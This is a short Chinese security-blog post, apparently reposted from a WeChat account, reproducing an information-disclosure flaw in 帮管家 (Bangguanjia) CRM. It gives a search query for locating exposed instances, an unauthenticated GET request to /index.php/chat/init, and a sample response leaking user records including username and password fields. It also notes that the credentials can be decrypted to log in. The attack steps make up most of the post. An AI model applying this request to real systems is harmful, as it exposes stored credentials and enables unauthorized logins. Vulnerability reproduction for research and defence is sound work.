声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
公众号现在只对常读和星标的公众号才展示大图推送,建议把公众号设为星标,否则可能就看不到啦!感谢各位师傅。
资产收集
web.icon=="67d3b36b2c6dfdb7fbd154b438b2826d"
漏洞复现
构造请求包
GET /index.php/chat/init HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
返回包
HTTP/1.1 302 FoundServer: nginx/1.15.11Date: Thu, 25 Jan 2024 07:38:33 GMTContent-Type: text/html; charset=utf-8Connection: keep-aliveX-Powered-By: PHP/7.0.9Set-Cookie: bgk_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22cd3e83a5aa33c9ceaf26d1696b0d0a76%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22175.167.145.25%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A119%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_14_3%29+AppleWebKit%2F605.1.15+%28KHTML%2C+like+Gecko%29+Version%2F12.0.3+Safari%2F605.1.15%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1706168313%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D4f5965116c2d4f012227ef83458b7f2dbff6d93c; expires=Thu, 25-Jan-2024 09:38:33 GMT; Max-Age=7200; path=/Location: /index.php/loginContent-Length: 820{"code":0,"msg":"u6210u529f","data":{"mine":{"username":"","id":"1","status":"online","avatar":"/themes/default/images/avatar.png","sign":""},"friend":{"":{"groupname":"","id":"1","list":[{"uid":"1","realname":"","username":"","userpwd":"","groupid":"1","roleid":"0","lever":null,"manage":null,"iszhuguan":"0","maxnum":"0","mobile":"","email":"","avatar":"/themes/default/images/avatar.png","theme":null,"theme_id":"0","theme_color":"0","desk_todolist":null,"desk_done_last":null,"hasim":"1","adduser":null,"addtime":"2022-09-21 22:18:17","state":"1","isdel":"0","deltime":null,"groupname":"u603bu7ecfu529e","id":"1"}]}},"group":[]}}
通过解密,username,password可以进行登录操作
原文始发于微信公众号(Devil安全):【漏洞复现】帮管家 CRM init 信息泄露漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论